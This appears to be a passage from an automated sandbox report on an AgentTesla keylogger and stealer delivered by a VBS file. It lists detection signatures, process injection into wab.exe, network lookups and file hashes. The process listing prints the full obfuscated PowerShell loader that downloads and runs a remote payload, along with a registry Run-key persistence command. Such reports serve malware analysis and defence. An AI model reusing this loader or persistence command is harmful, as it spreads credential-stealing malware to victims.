MD5 4a4d70fe78c5f12946b4676950b00e8a
SHA1 1d7977005546ad74ee56f36552c7aaef6c8dae20
SHA256 934c5a21da47652be278d09678d6fc16f3f3c4639bddd33c509d9b6bb024bf3f
SHA512 884f9bdd26b979f18c73280fc9270293e0b0c0a14094f8f47c74c8c08d8f033f9ff179269cc608f28097ed270c8491adf8510c512d7bcd8988c7d75e4e3c8def

memory/2916-82-0x00000000066A0000-0x000000000B13E000-memory.dmp

memory/2624-83-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/2624-84-0x000007FEF573E000-0x000007FEF573F000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 97cac688ae7032bfb0001f7096df0a78
SHA1 c0e9db883e0f7f2c1f7a689fa6d1a633a015e054
SHA256 9a9408d277b2fbd85a236395b975b07b4d0e9233932bff35bad4e58886f62536
SHA512 450f4818f70735bbd533aa35191e56c0060fb8ec7fe726f5589ca59639d0686ab846203f4292ec4fb8373c4f229a52f90ed97a9a5cab9bbdc7180c9b53274d1b

memory/896-120-0x0000000000540000-0x00000000015A2000-memory.dmp

memory/2624-121-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/896-122-0x0000000000540000-0x0000000000580000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 06:47

Reported

2024-06-03 06:49

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

145s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Doc09876545678.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cuichunchulli = "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\\Jalopy\\').nyansat;%Frbiddene% ($Gylpet)" | C:\Windows\SysWOW64\reg.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | api.ipify.org | N/A | N/A
N/A | api.ipify.org | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 3804 set thread context of 4364 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2376 wrote to memory of 4856 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2376 wrote to memory of 4856 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4856 wrote to memory of 2580 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 4856 wrote to memory of 2580 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 4856 wrote to memory of 3804 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4856 wrote to memory of 3804 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4856 wrote to memory of 3804 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3804 wrote to memory of 3156 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3804 wrote to memory of 3156 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3804 wrote to memory of 3156 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3804 wrote to memory of 4364 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 3804 wrote to memory of 4364 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 3804 wrote to memory of 4364 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 3804 wrote to memory of 4364 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 3804 wrote to memory of 4364 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 4364 wrote to memory of 2888 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 4364 wrote to memory of 2888 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 4364 wrote to memory of 2888 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 2888 wrote to memory of 5044 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2888 wrote to memory of 5044 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2888 wrote to memory of 5044 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Doc09876545678.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjertelse = 1;Function Desertr($Tocylindret){$Designerendes=$Tocylindret.Length-$Hjertelse;$Bortledt='Substring';For( $Isotherm=5;$Isotherm -lt $Designerendes;$Isotherm+=6){$fugtplettede+=$Tocylindret.$Bortledt.Invoke( $Isotherm, $Hjertelse);}$fugtplettede;}function Unsabbatical129($Udskilt){ . ($Genkomsters) ($Udskilt);}$Trolly=Desertr 'ForsyMm,taso,yingzKammeiCyclilGs,gil.jemgaPseud/Pickp5Assu,.Rankl0Paraf Oplsn(AlympWScen,iL,vprnE.ethdChoyaoMaskew Po.ysande .npiNVi ioTEnkel Nonge1Reek.0Planl.Bjank0Karai;Subje AnonW LactiRefednAnten6Leksi4 Ofri;Dokto ValexCirk 6Ly ke4Dogfa;As.ro OrfevrTilstv Ha t:Isola1Geode2Newfo1Smaab. Prio0 Judg) Pter Bagk,GSegmeeHandocInhabkKol.noI,dra/Conf.2Aller0.dsty1Velse0Deltr0Penu,1ronns0 wart1Phasm S.bflFFe toiFordrrG,bene BrudfDu.aloNederxSt,af/Quelq1Indby2Hmorr1Tjekk.Bruge0Ud os ';$Reexcavated=Desertr 'D verUBackss dnereKrftsrRe,om-NedtrAIthe g AzoteS.rinnExscitSquea ';$Anoesis=Desertr 'kommuhRadictDyreht vranp AktisZan i: Subl/Danse/ St,gdAss.rrSpillhAppl hGanglmCherma Reder BakskOlympeE,dertSygemiBivuanNonregErhve. TaagcKonteoOatlimReimp/StavbwLail.pUncur-Vrdi.aSubstdSla.bmAnretiHuskenFlydt/ SeksTE,cavrBe mer QuadeBra,rsAlmsdn Sulfo S lirG,ldee InmesUddre.Diartq OverxLordsd Tube ';$Delves=Desertr 'Soare>Roama ';$Genkomsters=Desertr 'AntehiNannaeDiploxEnsur ';$Alterbrds='Mameyes';$Impartable = Desertr ' Ne,veTetracOmgnghterraoCheck Stri %Unp rafo.ospAndenpPigm.dFj,rla omeot,aaneaEntra%Pal.e\,ymphpFacturKosmoeFremsf,utopu N,nvlAday gHaar.eRiddenOphavcIncreymargi.St alSmot ltD apho Blad Udtry&a rid& Lite BrahmeRag fcPicothteg.voSttte Pard t A,am ';Unsabbatical129 (Desertr ',etry$bibligFinanlSn ftoHjlpeb SperaShantl Dom.:EnwomSAviseaIgenbm SledlD aniiLactonB.kisgHalsesHade,mGenner unprkSpi.seSknsvtStagesBackp2Sludd0Inter3Divor= Foto(KlippcTutelmkartod rila .luff/Fr,gmc gens Subje$LingeICrocumToll.pBiaswaScenarin eftStankaMetodb DisalPl wme ,kul)B umb ');Unsabbatical129 (Desertr 'ledn.$PrivagLaanelSt,ado Eut.b PedaaMerkalPlasm: AutoIRibesrDelina Bre.sPreaccBrutti EllibSkrt.lBillieSejern ,ride ormssMoetssToril=Retsf$GybinA I brn B.llo,oupieDrif.sSphenipopuls,orku.AflgnsUnemipDecemlSynbai.efortPilla(Porg $NulliD ZeugethawilDatervAccreeAft.nsKjest)Skraa ');$Anoesis=$Irascibleness[0];$Indues= (Desertr '.esou$LysbagS,andlTr,laoCollobOpposa S del Srhf:Indd,B xotioActinsHumane Contr Hottu ProspCr misShlem=NyansNre,uleelefaw Rumf-IfeckO Fluib,rienj.rysteBydelcDeifit Gaff E,bndSfattiyAfgrdsC,olit,plineSalsumSamme. KemiN NitrePe,datB bec.Spio.W AutoeEkstrb eliC amlilBogstib,mnde OmslnIn,olt');$Indues+=$Samlingsmrkets203[1];Unsabbatical129 ($Indues);Unsabbatical129 (Desertr ' A ti$PentaBWo,teoSitresKvadreUmtterBilleuW,ewtp .oopsfremt.FritnHVivareHema aUdflidCapsoeAm.ulrFrangsLoglo[ rnit$ Con,RMiegyeSy,ame alcix Thorc ItinafalsivFolkeaMul tt,ontreH,rdydGuava],hala=Unins$FleerT Unecr Eup.o.odgilMo,etlSvendytrefa ');$Behrigt=Desertr 'Whisk$ ordwBCulicoKlninsA prveHreaprIrrevuLamelpElusosZebor.ChervDNiketoB,otbw.isimnFor,rlQuinooKro,pa,sseld aarrF mariiAg.anlSpidsestaph(Pdago$UnadjASkvalnIntero PyroeDe,ims ishmiOutcrsPodet,Snavs$ Sturb HistuLandbkU.drys,ifoneStrann,tymoeSplitdImitaeDrop.r DupedCoop e.aboul DroieAvlsbnUncome Cata)opbrd ';$buksenederdelene=$Samlingsmrkets203[0];Unsabbatical129 (Desertr 'Oph,h$HomodgHessil ForkoProvebafstvaDelicl Kern:S.ltaBPoitrrVapori ntiub UnpreSwellr AdsciSignieLoddes Tred=Belgn(KliniTK ngwe Endos Mandtdiges-Honn PMerlraApprotSnip,hF,ste Weani$r.binbDyrehuEyepokPonjasPortieToxicnAkkore DaildCongreMesiorLargodBiffieLeeuwlAsc.peLoga n KonfeCyclo) Kaet ');while (!$Briberies) {Unsabbatical129 (Desertr 'Grina$CaricgGalvalUnproo SatibIn,egaUnderlFemci: roteAn,tviuBerksr SylliLittecTru huPartilordspa AalbtKemi eFustadBaran=Udlyd$Fotogt IncorB,unduPreute Lepi ') ;Unsabbatical129 $Behrigt;Unsabbatical129 (Desertr ' UnciSTiltrtTiradaMaddarFanattStads-LedniSTaalelSnugsebaseseDiscopTeleo Homos4Basal ');Unsabbatical129 (Desertr 'Aleci$ Dripg Blaal OutfoTra,sbcri.ia T atlActin:IntonBT,intrMassei ForlbVenteeOm,ibrHarani OutbePlexosfritn=Aquad(Japa.TMalapeOmdbns St.ttA.kac-PartiPSubinaKortetEks rhSagsa arc$Po itbsv jsuSal akBrndesDokumeVlgernNapoleBlokkdFor.ke,ilfar DatadBeacoe Gau l Ung e Forkn GalaeYalen) Hav, ') ;Unsabbatical129 (Desertr 'Simne$I,recg sch lLabrio VensbPainta,nterl T,al: D.bbFNovemrSnuggiBomlrt Erhvu PolyrWebaseEc lesSaaletSm abeGra ig ConveTaktlrOxyne=,alse$Nudelg,ongllToparoAc epbOrangaBramml Peri: Kon.sGanoilForbuvKu,lepAnlbseSubulnHazelg,afete San nNee ceUndef+Al,it+.arbe% Ma,v$Gavs I epurDemonaNaulusWhitecconuziContebMispalManipe Dy vnTjenee BegisH maps ara.ThumpcNierno PussukamganhasidtForbu ') ;$Anoesis=$Irascibleness[$Frituresteger];}$Lidelsen=288008;$Unthrid=29506;Unsabbatical129 (Desertr ',ncol$VoltagA gumlMis.poOver.bRi geaSonoglSpare: SkufEI,mats Com s NichenonaprNondiaReolp Emend=Hindu .gsjGPolygeIngratLslad-F.rspCDrankoForskn Br.vtE,treeCo chnApla.tIsln. Inddm$OversbBudgeu A.ankGr,nds Sunde GallnSma.feUnclod pr,ieSo bor ArbadCivileInddalNonareVingenChuffe Fa,t ');Unsabbatical129 (Desertr 'Rebor$ FdesgwainrlDeliboUncocb.estiaSampllN.ska:PalpelCuscukFacepk.revee,affisOpgret OverrB udeuGallikSemi t apomuDkketrDi,cosFinla Hype =Sitco Kalor[FondsS FedtyMiljbs bukstAngele.oamemCnido.SacroCTjavso oentnGallivyppereLacqur Cat.tKaoli]Pegep:Entop:Zygo.FMangerDishooImambmTopv BkjoleaSt,ndsGrundeTempo6Ox,la4TopplSf,rlatKu,surSolidiGrilnnZygotgSosi.(Hexos$Gr ssEGodsesAlu isReexpe .ogdrGoldbaSkygg)Stem, ');Unsabbatical129 (Desertr 'Dol.a$.ranegKatall UdsuoKumu.bLandfa Fed,lCito.: T,gnu,erienGuzerdFodslrHepate BerbaK,besmTimeltNephe Ultra=Filig Diplo[VierkSgigmay Delis BandtAnakoe GynimEks r. SaccTMyopoe Es.rx Tr btKdsa,.AsterE Ell n For.c RegioT,keldH,rmoiSpectnKhedagGr nd]Dicoe:nitte:SummeAsel hS .ncoC I.poI.onkuIoddit.AkeraGmidjeeSk.pttAss iSFo slt .lvor .agsiCamern UrbagAdloe(Sh tg$ tearlNonobk FrdikZeucteIntr.sIn botBacterBothyuhiphukBr.actBuncouOutplrAccepsdicti)Polyd ');Unsabbatical129 (Desertr 'Fors.$Deceng Obsel UfuloGaestbConjuaSkriblUdpre: B,naNBe ona DinnvG uffiB inkgSam,eadcbalt ngdeiEnke.oUnoxinLeninsDisa.sSuperkoddfeoSmintl TrileRam,l=Ridde$Hel.euNonexn MejedBinderKon.oeFer.iaStengm Kry,tcabre.con esHak iuFagkrb GrnssUdplatS,nderKenmaiVillinThor,g Tils(.rbej$Tron LR,foriRoutidPot,neVag,sl KasssAfdryeDe ornH.lde,Tun c$RekurU Le.anKro,otBef yhSpytsr.edali,acetdSta y)Snekk ');Unsabbatical129 $Navigationsskole;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\prefulgency.Sto && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjertelse = 1;Function Desertr($Tocylindret){$Designerendes=$Tocylindret.Length-$Hjertelse;$Bortledt='Substring';For( $Isotherm=5;$Isotherm -lt $Designerendes;$Isotherm+=6){$fugtplettede+=$Tocylindret.$Bortledt.Invoke( $Isotherm, $Hjertelse);}$fugtplettede;}function Unsabbatical129($Udskilt){ . ($Genkomsters) ($Udskilt);}$Trolly=Desertr 'ForsyMm,taso,yingzKammeiCyclilGs,gil.jemgaPseud/Pickp5Assu,.Rankl0Paraf Oplsn(AlympWScen,iL,vprnE.ethdChoyaoMaskew Po.ysande .npiNVi ioTEnkel Nonge1Reek.0Planl.Bjank0Karai;Subje AnonW LactiRefednAnten6Leksi4 Ofri;Dokto ValexCirk 6Ly ke4Dogfa;As.ro OrfevrTilstv Ha t:Isola1Geode2Newfo1Smaab. Prio0 Judg) Pter Bagk,GSegmeeHandocInhabkKol.noI,dra/Conf.2Aller0.dsty1Velse0Deltr0Penu,1ronns0 wart1Phasm S.bflFFe toiFordrrG,bene BrudfDu.aloNederxSt,af/Quelq1Indby2Hmorr1Tjekk.Bruge0Ud os ';$Reexcavated=Desertr 'D verUBackss dnereKrftsrRe,om-NedtrAIthe g AzoteS.rinnExscitSquea ';$Anoesis=Desertr 'kommuhRadictDyreht vranp AktisZan i: Subl/Danse/ St,gdAss.rrSpillhAppl hGanglmCherma Reder BakskOlympeE,dertSygemiBivuanNonregErhve. TaagcKonteoOatlimReimp/StavbwLail.pUncur-Vrdi.aSubstdSla.bmAnretiHuskenFlydt/ SeksTE,cavrBe mer QuadeBra,rsAlmsdn Sulfo S lirG,ldee InmesUddre.Diartq OverxLordsd Tube ';$Delves=Desertr 'Soare>Roama ';$Genkomsters=Desertr 'AntehiNannaeDiploxEnsur ';$Alterbrds='Mameyes';$Impartable = Desertr ' Ne,veTetracOmgnghterraoCheck Stri %Unp rafo.ospAndenpPigm.dFj,rla omeot,aaneaEntra%Pal.e\,ymphpFacturKosmoeFremsf,utopu N,nvlAday gHaar.eRiddenOphavcIncreymargi.St alSmot ltD apho Blad Udtry&a rid& Lite BrahmeRag fcPicothteg.voSttte Pard t A,am ';Unsabbatical129 (Desertr ',etry$bibligFinanlSn ftoHjlpeb SperaShantl Dom.:EnwomSAviseaIgenbm SledlD aniiLactonB.kisgHalsesHade,mGenner unprkSpi.seSknsvtStagesBackp2Sludd0Inter3Divor= Foto(KlippcTutelmkartod rila .luff/Fr,gmc gens Subje$LingeICrocumToll.pBiaswaScenarin eftStankaMetodb DisalPl wme ,kul)B umb ');Unsabbatical129 (Desertr 'ledn.$PrivagLaanelSt,ado Eut.b PedaaMerkalPlasm: AutoIRibesrDelina Bre.sPreaccBrutti EllibSkrt.lBillieSejern ,ride ormssMoetssToril=Retsf$GybinA I brn B.llo,oupieDrif.sSphenipopuls,orku.AflgnsUnemipDecemlSynbai.efortPilla(Porg $NulliD ZeugethawilDatervAccreeAft.nsKjest)Skraa ');$Anoesis=$Irascibleness[0];$Indues= (Desertr '.esou$LysbagS,andlTr,laoCollobOpposa S del Srhf:Indd,B xotioActinsHumane Contr Hottu ProspCr misShlem=NyansNre,uleelefaw Rumf-IfeckO Fluib,rienj.rysteBydelcDeifit Gaff E,bndSfattiyAfgrdsC,olit,plineSalsumSamme. KemiN NitrePe,datB bec.Spio.W AutoeEkstrb eliC amlilBogstib,mnde OmslnIn,olt');$Indues+=$Samlingsmrkets203[1];Unsabbatical129 ($Indues);Unsabbatical129 (Desertr ' A ti$PentaBWo,teoSitresKvadreUmtterBilleuW,ewtp .oopsfremt.FritnHVivareHema aUdflidCapsoeAm.ulrFrangsLoglo[ rnit$ Con,RMiegyeSy,ame alcix Thorc ItinafalsivFolkeaMul tt,ontreH,rdydGuava],hala=Unins$FleerT Unecr Eup.o.odgilMo,etlSvendytrefa ');$Behrigt=Desertr 'Whisk$ ordwBCulicoKlninsA prveHreaprIrrevuLamelpElusosZebor.ChervDNiketoB,otbw.isimnFor,rlQuinooKro,pa,sseld aarrF mariiAg.anlSpidsestaph(Pdago$UnadjASkvalnIntero PyroeDe,ims ishmiOutcrsPodet,Snavs$ Sturb HistuLandbkU.drys,ifoneStrann,tymoeSplitdImitaeDrop.r DupedCoop e.aboul DroieAvlsbnUncome Cata)opbrd ';$buksenederdelene=$Samlingsmrkets203[0];Unsabbatical129 (Desertr 'Oph,h$HomodgHessil ForkoProvebafstvaDelicl Kern:S.ltaBPoitrrVapori ntiub UnpreSwellr AdsciSignieLoddes Tred=Belgn(KliniTK ngwe Endos Mandtdiges-Honn PMerlraApprotSnip,hF,ste Weani$r.binbDyrehuEyepokPonjasPortieToxicnAkkore DaildCongreMesiorLargodBiffieLeeuwlAsc.peLoga n KonfeCyclo) Kaet ');while (!$Briberies) {Unsabbatical129 (Desertr 'Grina$CaricgGalvalUnproo SatibIn,egaUnderlFemci: roteAn,tviuBerksr SylliLittecTru huPartilordspa AalbtKemi eFustadBaran=Udlyd$Fotogt IncorB,unduPreute Lepi ') ;Unsabbatical129 $Behrigt;Unsabbatical129 (Desertr ' UnciSTiltrtTiradaMaddarFanattStads-LedniSTaalelSnugsebaseseDiscopTeleo Homos4Basal ');Unsabbatical129 (Desertr 'Aleci$ Dripg Blaal OutfoTra,sbcri.ia T atlActin:IntonBT,intrMassei ForlbVenteeOm,ibrHarani OutbePlexosfritn=Aquad(Japa.TMalapeOmdbns St.ttA.kac-PartiPSubinaKortetEks rhSagsa arc$Po itbsv jsuSal akBrndesDokumeVlgernNapoleBlokkdFor.ke,ilfar DatadBeacoe Gau l Ung e Forkn GalaeYalen) Hav, ') ;Unsabbatical129 (Desertr 'Simne$I,recg sch lLabrio VensbPainta,nterl T,al: D.bbFNovemrSnuggiBomlrt Erhvu PolyrWebaseEc lesSaaletSm abeGra ig ConveTaktlrOxyne=,alse$Nudelg,ongllToparoAc epbOrangaBramml Peri: Kon.sGanoilForbuvKu,lepAnlbseSubulnHazelg,afete San nNee ceUndef+Al,it+.arbe% Ma,v$Gavs I epurDemonaNaulusWhitecconuziContebMispalManipe Dy vnTjenee BegisH maps ara.ThumpcNierno PussukamganhasidtForbu ') ;$Anoesis=$Irascibleness[$Frituresteger];}$Lidelsen=288008;$Unthrid=29506;Unsabbatical129 (Desertr ',ncol$VoltagA gumlMis.poOver.bRi geaSonoglSpare: SkufEI,mats Com s NichenonaprNondiaReolp Emend=Hindu .gsjGPolygeIngratLslad-F.rspCDrankoForskn Br.vtE,treeCo chnApla.tIsln. Inddm$OversbBudgeu A.ankGr,nds Sunde GallnSma.feUnclod pr,ieSo bor ArbadCivileInddalNonareVingenChuffe Fa,t ');Unsabbatical129 (Desertr 'Rebor$ FdesgwainrlDeliboUncocb.estiaSampllN.ska:PalpelCuscukFacepk.revee,affisOpgret OverrB udeuGallikSemi t apomuDkketrDi,cosFinla Hype =Sitco Kalor[FondsS FedtyMiljbs bukstAngele.oamemCnido.SacroCTjavso oentnGallivyppereLacqur Cat.tKaoli]Pegep:Entop:Zygo.FMangerDishooImambmTopv BkjoleaSt,ndsGrundeTempo6Ox,la4TopplSf,rlatKu,surSolidiGrilnnZygotgSosi.(Hexos$Gr ssEGodsesAlu isReexpe .ogdrGoldbaSkygg)Stem, ');Unsabbatical129 (Desertr 'Dol.a$.ranegKatall UdsuoKumu.bLandfa Fed,lCito.: T,gnu,erienGuzerdFodslrHepate BerbaK,besmTimeltNephe Ultra=Filig Diplo[VierkSgigmay Delis BandtAnakoe GynimEks r. SaccTMyopoe Es.rx Tr btKdsa,.AsterE Ell n For.c RegioT,keldH,rmoiSpectnKhedagGr nd]Dicoe:nitte:SummeAsel hS .ncoC I.poI.onkuIoddit.AkeraGmidjeeSk.pttAss iSFo slt .lvor .agsiCamern UrbagAdloe(Sh tg$ tearlNonobk FrdikZeucteIntr.sIn botBacterBothyuhiphukBr.actBuncouOutplrAccepsdicti)Polyd ');Unsabbatical129 (Desertr 'Fors.$Deceng Obsel UfuloGaestbConjuaSkriblUdpre: B,naNBe ona DinnvG uffiB inkgSam,eadcbalt ngdeiEnke.oUnoxinLeninsDisa.sSuperkoddfeoSmintl TrileRam,l=Ridde$Hel.euNonexn MejedBinderKon.oeFer.iaStengm Kry,tcabre.con esHak iuFagkrb GrnssUdplatS,nderKenmaiVillinThor,g Tils(.rbej$Tron LR,foriRoutidPot,neVag,sl KasssAfdryeDe ornH.lde,Tun c$RekurU Le.anKro,otBef yhSpytsr.edali,acetdSta y)Snekk ');Unsabbatical129 $Navigationsskole;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\prefulgency.Sto && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Cuichunchulli" /t REG_EXPAND_SZ /d "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\Jalopy\').nyansat;%Frbiddene% ($Gylpet)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Cuichunchulli" /t REG_EXPAND_SZ /d "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\Jalopy\').nyansat;%Frbiddene% ($Gylpet)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 drhhmarketing.com udp
US 104.21.39.61:443 drhhmarketing.com tcp
US 8.8.8.8:53 61.39.21.104.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 104.21.39.61:443 drhhmarketing.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
BE 23.55.97.11:80 x2.c.lencr.org tcp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp

Files

memory/4856-0-0x00007FFBEFCA3000-0x00007FFBEFCA5000-memory.dmp

memory/4856-1-0x00000142E7150000-0x00000142E7172000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3kovfzfb.5nl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4856-11-0x00007FFBEFCA0000-0x00007FFBF0761000-memory.dmp

memory/4856-12-0x00007FFBEFCA0000-0x00007FFBF0761000-memory.dmp

memory/3804-15-0x0000000004AB0000-0x0000000004AE6000-memory.dmp

memory/3804-16-0x0000000005250000-0x0000000005878000-memory.dmp

memory/3804-17-0x00000000051D0000-0x00000000051F2000-memory.dmp

memory/3804-18-0x00000000059B0000-0x0000000005A16000-memory.dmp

memory/3804-19-0x0000000005A20000-0x0000000005A86000-memory.dmp

memory/3804-29-0x0000000005B90000-0x0000000005EE4000-memory.dmp

memory/3804-30-0x0000000006070000-0x000000000608E000-memory.dmp

memory/3804-31-0x00000000060C0000-0x000000000610C000-memory.dmp

memory/3804-32-0x00000000078C0000-0x0000000007F3A000-memory.dmp

memory/3804-33-0x0000000006600000-0x000000000661A000-memory.dmp

memory/3804-34-0x0000000007320000-0x00000000073B6000-memory.dmp

memory/3804-35-0x00000000072B0000-0x00000000072D2000-memory.dmp

memory/3804-36-0x00000000084F0000-0x0000000008A94000-memory.dmp

C:\Users\Admin\AppData\Roaming\prefulgency.Sto

MD5 4a4d70fe78c5f12946b4676950b00e8a
SHA1 1d7977005546ad74ee56f36552c7aaef6c8dae20
SHA256 934c5a21da47652be278d09678d6fc16f3f3c4639bddd33c509d9b6bb024bf3f
SHA512 884f9bdd26b979f18c73280fc9270293e0b0c0a14094f8f47c74c8c08d8f033f9ff179269cc608f28097ed270c8491adf8510c512d7bcd8988c7d75e4e3c8def

memory/3804-38-0x0000000008AA0000-0x000000000D53E000-memory.dmp

memory/4856-39-0x00007FFBEFCA3000-0x00007FFBEFCA5000-memory.dmp

memory/4856-41-0x00007FFBEFCA0000-0x00007FFBF0761000-memory.dmp

memory/4364-49-0x0000000000680000-0x00000000006C0000-memory.dmp

memory/4364-48-0x0000000000680000-0x00000000018D4000-memory.dmp

memory/4856-52-0x00007FFBEFCA0000-0x00007FFBF0761000-memory.dmp

memory/4364-54-0x0000000024AB0000-0x0000000024B00000-memory.dmp

